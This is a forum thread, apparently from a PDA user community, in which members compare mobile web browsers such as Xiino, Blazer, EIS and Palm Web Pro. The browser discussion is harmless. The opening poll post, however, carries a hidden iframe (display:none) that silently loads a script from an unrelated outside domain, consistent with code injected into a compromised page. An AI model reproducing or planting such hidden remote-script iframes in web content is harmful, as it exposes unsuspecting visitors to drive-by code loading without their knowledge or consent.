Poll: Which web broswer do you use most?

+ Reply to Thread

Which web browser do you like most?

please vote<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

tough to answer

This is actually quite difficult to answer, because each of the browsers has features not shared by the others that determine which I would use when...

For viewing sites with primarily text information that I want to load really fast (like mobile.smartphone.com), I use Eudora web

For viewing sites designed specifically for mobile use (WAP or formatted for PDA), I use Blazer

For viewing regular web sites where the author's formating is important, I use EIS

For viewing graphic intensive sites where formating is not as important, I am starting to use Xiino (haven't registered yet, but thinking about it.. The Xiino proxy reduces the size of image files before transmitting them which makes it really quick with graphics. If it had the view formatting options of EIS, I would probably use it instead of EIS all of the time, although it has it's own quirks (doesn't seem to have a stop button, bookmarks are handled very oddly, others....).

Alan

It drives me crazy to not have a browser able to connect to a site to load a page.. and I've had problems with Xiino in this respect.

The only other one I have is eudora web, and it seems to do a pretty good job on text.
    -- Everything I say is pure speculation.

Administrator
    Xiino

I love Xiino, but have an intermittent problem with it (which is particularly bad today). When using a qnc connection, it often has problems connecting to sites. However, if I then connect with Express network, there are no problems. When having the qnc problem, I am able to use other browsers or get mail without difficulty, so there seems to be something peculiar to Xiino and the qnc connection....

I used to swear to Blazer, but now swear to WebProV. Try it - you'll like it.

Is that like Pantene Pro V?
    ~'kito
    pdaPhoneHome Moderator

:clap

Does WebProV have 128 bit encryption for banking websites?
    iPhone therefore iAm.

Don't think so but it handles Javascript and accepts cookies. Also has great formatting (like Blazer).

It's actually called Palm Web Pro and is "powered by Novarra".

where can i find info about it? I tried novarra.com and didnt find a download or many specs.
    iPhone therefore iAm.

Administrator
    yeah, give details... avantgo is doing prety good... and so is my air card...